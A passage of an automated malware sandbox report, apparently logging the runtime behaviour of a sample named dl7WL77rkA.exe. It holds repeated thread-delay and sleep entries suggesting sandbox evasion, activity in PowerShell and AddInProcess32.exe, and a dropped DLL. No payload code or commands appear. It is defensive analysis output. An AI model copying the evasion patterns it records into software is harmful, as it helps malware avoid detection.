                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 571901
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 571540
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 571252
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 570621
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 569433
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 567786
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 567430
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 567022
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 566808
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 566377
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 566059
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 565580
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 565013
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 564318
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 563781
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 563375
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 562136
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 561159
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 560511
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 559868
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 559543
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 559278
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 558825
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 558612
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 558271
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 557957
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 557511
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 557172
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 556925
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 556480
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 556177
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 555870
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 555625
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 555435
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 555128
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 554852
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 554123
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 553836
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 553532
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 550943
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 550615
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 550254
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 549815
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 549593
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 549415
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 549082
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 548720
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 548348
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 548105
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 547885
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 547686
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 547497
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 547279
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 547168
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 547042
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 546933
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 546744
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 546608
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 546423
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 546268
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 546085
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 545920
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 545739
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 545568
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 545414
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 545280
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 545163
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 545020
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 544883
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 544717
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 544513
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 544311
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 544190
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 544059
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 543855
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 543693
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 543545
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 543413
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 543228
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 543092
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 542952
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 542810
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 542668
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 542559
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 542427
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 542307
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 542044
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 541732
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 541597
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 541477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 541334
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 541220
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 541092
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 540945
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 540829
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 540715
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 540601
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 540476
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 540348
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 540224
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 540104
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 539942
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 539804
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 539683
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 539562
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 539445
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 539336
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 539229
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 539114
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 538990
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 538848
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 538726
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 538608
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 538481
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 538355
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 538241
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 538119
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 537996
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 537859
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 537752
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 537638
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 537507
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 537390
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeWindow / User API: threadDelayed 6622Jump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeWindow / User API: threadDelayed 409Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6667Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWindow / User API: threadDelayed 8505
                  Source: C:\Users\user\AppData\Local\Temp\wfplwfs.exeWindow / User API: threadDelayed 9401
                  Source: C:\Users\user\AppData\Local\Temp\wfplwfs.exeWindow / User API: threadDelayed 595
                  Source: C:\Windows\System32\conhost.exeWindow / User API: threadDelayed 405
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsh1C9B.tmp\INetC.dllJump to dropped file
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exe TID: 5432Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exe TID: 5432Thread sleep time: -100000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exe TID: 5432Thread sleep time: -99875s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exe TID: 5432Thread sleep time: -99765s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exe TID: 5432Thread sleep time: -99656s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exe TID: 5432Thread sleep time: -99521s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exe TID: 5432Thread sleep time: -99357s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exe TID: 5432Thread sleep time: -99217s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exe TID: 5432Thread sleep time: -99031s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exe TID: 5432Thread sleep time: -98918s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exe TID: 5432Thread sleep time: -98812s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exe TID: 5432Thread sleep time: -98703s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exe TID: 5432Thread sleep time: -98586s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exe TID: 5432Thread sleep time: -98469s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exe TID: 5432Thread sleep time: -98328s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exe TID: 5432Thread sleep time: -98197s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exe TID: 5432Thread sleep time: -98031s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exe TID: 5432Thread sleep time: -97922s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exe TID: 5432Thread sleep time: -97811s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exe TID: 5432Thread sleep time: -97689s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exe TID: 5432Thread sleep time: -97547s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exe TID: 5432Thread sleep time: -97429s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exe TID: 5432Thread sleep time: -97250s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exe TID: 5432Thread sleep time: -96969s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exe TID: 5432Thread sleep time: -96820s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exe TID: 5432Thread sleep time: -96641s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exe TID: 5432Thread sleep time: -96515s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exe TID: 5432Thread sleep time: -95996s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exe TID: 5432Thread sleep time: -95842s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exe TID: 5432Thread sleep time: -95719s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exe TID: 5432Thread sleep time: -95593s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exe TID: 5432Thread sleep time: -95345s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exe TID: 5432Thread sleep time: -95094s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exe TID: 5432Thread sleep time: -94969s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exe TID: 5432Thread sleep time: -94811s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exe TID: 5432Thread sleep time: -94702s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exe TID: 5432Thread sleep time: -94547s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exe TID: 5432Thread sleep time: -94281s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exe TID: 5432Thread sleep time: -94093s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exe TID: 5432Thread sleep time: -93953s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exe TID: 5432Thread sleep time: -93750s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exe TID: 5432Thread sleep time: -93547s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exe TID: 5432Thread sleep time: -93396s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exe TID: 5432Thread sleep time: -92906s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exe TID: 5432Thread sleep time: -92740s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exe TID: 5432Thread sleep time: -92594s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exe TID: 5432Thread sleep time: -92453s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exe TID: 5432Thread sleep time: -92259s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exe TID: 5432Thread sleep time: -92148s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 44572Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 44392Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -11068046444225724s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -600000s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44644Thread sleep count: 8505 > 30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -599859s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -599719s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -599561s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -599430s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -599299s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -599174s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -599031s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -598893s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -598766s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -598620s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -598483s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -598351s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -598222s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44268Thread sleep time: -2700000s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -598084s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -597953s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -597813s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -597637s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -597472s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -597346s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -597203s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -597037s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -596914s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -596800s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -596672s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -596547s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -596406s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -596279s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -596135s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -595922s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -595776s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -595625s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -595495s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -595375s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -595250s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -594920s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -594786s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -594641s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -594406s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -594217s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -593922s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -593469s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -592990s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -592563s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -592250s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -591656s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -591203s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -590125s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -588906s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -588453s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -587906s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -585188s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -584641s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -584063s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -583359s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -582781s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -582250s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -581563s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -581094s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -580531s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -580031s >= -30000s
